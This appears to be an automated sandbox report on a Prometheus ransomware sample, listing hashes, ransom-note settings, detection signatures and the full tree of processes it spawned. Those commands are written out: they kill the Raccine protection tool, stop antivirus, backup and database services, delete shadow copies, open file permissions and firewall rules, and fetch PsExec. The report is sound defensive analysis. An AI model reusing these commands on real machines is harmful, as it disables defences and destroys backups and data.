Analysis
-
max time kernel
149s -
max time network
158s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
02-06-2021 15:02
Static task
static1
Behavioral task
behavioral1
Sample
dd4eb8aa3371b7fd821a7a9730c924cf.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
dd4eb8aa3371b7fd821a7a9730c924cf.exe
Resource
win10v20210408
General
-
Target
dd4eb8aa3371b7fd821a7a9730c924cf.exe
-
Size
194KB
-
MD5
dd4eb8aa3371b7fd821a7a9730c924cf
-
SHA1
3e53f7bf7dcb8569aaf0f3a3bcf67bda4c01c054
-
SHA256
9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184
-
SHA512
12e760a59377632548f41bbdb98941a04c7d32b5d084f70b23db702dbeabb1e7a489df6d03af40da977a463150e4d144641fbc4640037e8858897a0509c9f356
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
prometheus
https://privatlab.com/file
http://sonarmsniko2lvfu.onion/?a=reg
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
prometheus
https://privatlab.com/file
http://sonarmsniko2lvfu.onion/?a=reg
Signatures
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Blocklisted process makes network request 9 IoCs
Processes:
mshta.exeflow pid process 35 11344 mshta.exe 36 11344 mshta.exe 37 11344 mshta.exe 39 11344 mshta.exe 41 11344 mshta.exe 43 11344 mshta.exe 45 11344 mshta.exe 46 11344 mshta.exe 47 11344 mshta.exe -
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
Processes:
description flow ioc HTTP URL 13 http://live.sysinternals.com/PsExec.exe -
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
dd4eb8aa3371b7fd821a7a9730c924cf.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 10452 icacls.exe 10444 icacls.exe 10460 icacls.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 30 icanhazip.com -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
dd4eb8aa3371b7fd821a7a9730c924cf.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." dd4eb8aa3371b7fd821a7a9730c924cf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 10396 taskkill.exe 7276 taskkill.exe 6976 taskkill.exe 10380 taskkill.exe 10244 taskkill.exe 6984 taskkill.exe 7092 taskkill.exe 7688 taskkill.exe 3776 taskkill.exe 10292 taskkill.exe 7784 taskkill.exe 7212 taskkill.exe 7044 taskkill.exe 10388 taskkill.exe 10316 taskkill.exe 10268 taskkill.exe 7932 taskkill.exe 10236 taskkill.exe 10116 taskkill.exe 10048 taskkill.exe 10168 taskkill.exe 10348 taskkill.exe 10328 taskkill.exe 10304 taskkill.exe 8164 taskkill.exe 2204 taskkill.exe 7760 taskkill.exe 8020 taskkill.exe 10404 taskkill.exe 10364 taskkill.exe 10340 taskkill.exe 8252 taskkill.exe 10144 taskkill.exe 10184 taskkill.exe 10356 taskkill.exe 10280 taskkill.exe 10256 taskkill.exe 7672 taskkill.exe 2208 taskkill.exe 10216 taskkill.exe 10200 taskkill.exe 10132 taskkill.exe 10084 taskkill.exe 10072 taskkill.exe 10024 taskkill.exe 10372 taskkill.exe 2672 taskkill.exe 10096 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
dd4eb8aa3371b7fd821a7a9730c924cf.exepid process 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
dd4eb8aa3371b7fd821a7a9730c924cf.exenet.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe Token: SeDebugPrivilege 3776 net.exe Token: SeDebugPrivilege 10292 taskkill.exe Token: SeDebugPrivilege 10316 taskkill.exe Token: SeDebugPrivilege 10364 taskkill.exe Token: SeDebugPrivilege 10348 taskkill.exe Token: SeDebugPrivilege 10372 taskkill.exe Token: SeDebugPrivilege 10356 taskkill.exe Token: SeDebugPrivilege 10256 taskkill.exe Token: SeDebugPrivilege 10280 taskkill.exe Token: SeDebugPrivilege 10388 taskkill.exe Token: SeDebugPrivilege 10268 taskkill.exe Token: SeDebugPrivilege 10328 taskkill.exe Token: SeDebugPrivilege 10304 taskkill.exe Token: SeDebugPrivilege 10404 taskkill.exe Token: SeDebugPrivilege 10024 taskkill.exe Token: SeDebugPrivilege 10340 taskkill.exe Token: SeDebugPrivilege 10048 taskkill.exe Token: SeDebugPrivilege 10396 taskkill.exe Token: SeDebugPrivilege 10132 taskkill.exe Token: SeDebugPrivilege 10380 taskkill.exe Token: SeDebugPrivilege 10216 taskkill.exe Token: SeDebugPrivilege 10144 taskkill.exe Token: SeDebugPrivilege 10184 taskkill.exe Token: SeDebugPrivilege 10200 taskkill.exe Token: SeDebugPrivilege 10236 taskkill.exe Token: SeDebugPrivilege 10116 taskkill.exe Token: SeDebugPrivilege 10084 taskkill.exe Token: SeDebugPrivilege 10168 taskkill.exe Token: SeDebugPrivilege 10096 taskkill.exe Token: SeDebugPrivilege 10072 taskkill.exe Token: SeDebugPrivilege 7044 taskkill.exe Token: SeDebugPrivilege 7932 taskkill.exe Token: SeDebugPrivilege 10244 taskkill.exe Token: SeDebugPrivilege 6984 taskkill.exe Token: SeDebugPrivilege 8252 taskkill.exe Token: SeDebugPrivilege 8164 taskkill.exe Token: SeDebugPrivilege 2204 taskkill.exe Token: SeDebugPrivilege 2672 taskkill.exe Token: SeDebugPrivilege 7760 taskkill.exe Token: SeDebugPrivilege 7784 taskkill.exe Token: SeDebugPrivilege 7092 taskkill.exe Token: SeDebugPrivilege 2208 taskkill.exe Token: SeDebugPrivilege 7672 taskkill.exe Token: SeDebugPrivilege 7276 taskkill.exe Token: SeDebugPrivilege 6976 taskkill.exe Token: SeDebugPrivilege 7212 taskkill.exe Token: SeDebugPrivilege 7688 taskkill.exe Token: SeDebugPrivilege 10412 powershell.exe Token: SeDebugPrivilege 15676 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
dd4eb8aa3371b7fd821a7a9730c924cf.exepid process 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
dd4eb8aa3371b7fd821a7a9730c924cf.exepid process 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
dd4eb8aa3371b7fd821a7a9730c924cf.exedescription pid process target process PID 744 wrote to memory of 3776 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe taskkill.exe PID 744 wrote to memory of 3776 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe taskkill.exe PID 744 wrote to memory of 3776 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe taskkill.exe PID 744 wrote to memory of 2308 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe reg.exe PID 744 wrote to memory of 2308 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe reg.exe PID 744 wrote to memory of 2308 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe reg.exe PID 744 wrote to memory of 960 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe reg.exe PID 744 wrote to memory of 960 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe reg.exe PID 744 wrote to memory of 960 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe reg.exe PID 744 wrote to memory of 708 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe schtasks.exe PID 744 wrote to memory of 708 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe schtasks.exe PID 744 wrote to memory of 708 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe schtasks.exe PID 744 wrote to memory of 1368 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe cmd.exe PID 744 wrote to memory of 1368 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe cmd.exe PID 744 wrote to memory of 1368 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe cmd.exe PID 744 wrote to memory of 2084 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe cmd.exe PID 744 wrote to memory of 2084 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe cmd.exe PID 744 wrote to memory of 2084 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe cmd.exe PID 744 wrote to memory of 3656 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe netsh.exe PID 744 wrote to memory of 3656 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe netsh.exe PID 744 wrote to memory of 3656 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe netsh.exe PID 744 wrote to memory of 3044 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe netsh.exe PID 744 wrote to memory of 3044 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe netsh.exe PID 744 wrote to memory of 3044 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe netsh.exe PID 744 wrote to memory of 2504 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 2504 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 2504 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 3796 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 3796 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 3796 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 2024 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 2024 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 2024 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 4088 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 4088 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 4088 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 1036 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 1036 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 1036 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 1296 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 1296 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 1296 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 2712 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 2712 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 2712 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 3064 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 3064 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 3064 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe sc.exe PID 744 wrote to memory of 3920 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 3920 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 3920 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 3068 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 3068 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 3068 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 2220 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 2220 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 2220 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 2616 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 2616 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 2616 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 1184 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 1184 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 1184 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe PID 744 wrote to memory of 3236 744 dd4eb8aa3371b7fd821a7a9730c924cf.exe net.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
dd4eb8aa3371b7fd821a7a9730c924cf.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." dd4eb8aa3371b7fd821a7a9730c924cf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" dd4eb8aa3371b7fd821a7a9730c924cf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" dd4eb8aa3371b7fd821a7a9730c924cf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..." dd4eb8aa3371b7fd821a7a9730c924cf.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:744 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
PID:3776
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:2308
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:960
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:708
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:1368
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:2084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:12264
-
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:3656
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:2504
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:3044
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:3796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:10928
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵PID:2024
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:4088
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:3064
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:2712
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1296
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1036
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y2⤵PID:3068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵PID:4140
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵PID:2616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:4100
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:3852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:4560
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:4092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:4624
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵PID:4244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:4784
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:4296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:4848
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:4200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:4796
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:4356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:4932
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:4400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:4980
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y2⤵PID:4648
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵PID:4556
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y2⤵PID:4708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:4352
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y2⤵PID:4896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:7912
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y2⤵PID:4952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:7920
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:5076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:10540
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3776 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:4416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:2308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:11176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y2⤵PID:960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:11072
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:2712
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:5100
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:4300
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y2⤵PID:2852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:10808
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:4940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:10776
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y2⤵PID:4168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵PID:12248
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y2⤵PID:3364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵PID:12224
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:11008
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:3180
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:11152
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:5828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:14196
-
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:10460
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:10892
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:10452
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:10444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:10412
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10404
-
-
